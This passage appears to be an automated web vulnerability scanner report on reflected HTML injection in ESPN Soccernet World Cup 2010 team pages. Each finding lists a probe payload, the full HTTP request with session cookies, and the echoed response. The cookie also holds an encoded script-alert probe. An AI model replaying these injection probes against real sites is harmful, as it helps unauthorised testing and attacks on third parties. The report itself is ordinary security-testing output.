Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:13 GMT Content-Length: 81157 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&6efac"><a>1119d197ed9=1&_slug_=italy&6efac"> ...[SNIP]...
|
2.5. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/164/spain
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53655"><a>809ac03abe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain53655"><a>809ac03abe5 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:00 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 23:34:00 GMT
Content-Length: 80715
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&_slug_=spain53655"><a>809ac03abe5&topId=808124&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.6. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/164/spain
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b73"><a>65c93cd4adf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain?99b73"><a>65c93cd4adf=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:16 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 23:33:16 GMT
Content-Length: 80823
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&99b73"><a>65c93cd4adf=1&_slug_=spain&99b73"> ...[SNIP]...
2.7. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/202/argentina
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70388"><a>c589cccb3a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina70388"><a>c589cccb3a6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Sat, 06 Nov 2010 23:12:50 GMT
Content-Length: 81978
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&_slug_=argentina70388"><a>c589cccb3a6&topId=805659&linktext=Heinze+wants+Maradona+to+continue"> ...[SNIP]...
2.8. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/202/argentina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5da"><a>9b858241cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina?cf5da"><a>9b858241cd5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Sat, 06 Nov 2010 23:12:01 GMT
Content-Length: 82086
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&cf5da"><a>9b858241cd5=1&_slug_=argentina&cf5da"> ...[SNIP]...
2.9. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/205/brazil
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da7b"><a>7d96bab73b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil6da7b"><a>7d96bab73b8 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:14:01 GMT
Content-Length: 81397
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&_slug_=brazil6da7b"><a>7d96bab73b8&topId=806003&linktext=Ex-Milan+coach+available"> ...[SNIP]...
2.10. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/205/brazil
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d87"><a>b513fd88d09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/205/brazil?36d87"><a>b513fd88d09=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:12:42 GMT
Content-Length: 81505
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Brazil Football / S ...[SNIP]... <a href="/worldcup2010/team?team=205&36d87"><a>b513fd88d09=1&_slug_=brazil&36d87"> ...[SNIP]...
2.11. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/207/chile
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977b9"><a>d4b442ea0d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/207/chile977b9"><a>d4b442ea0d6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:57 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN14
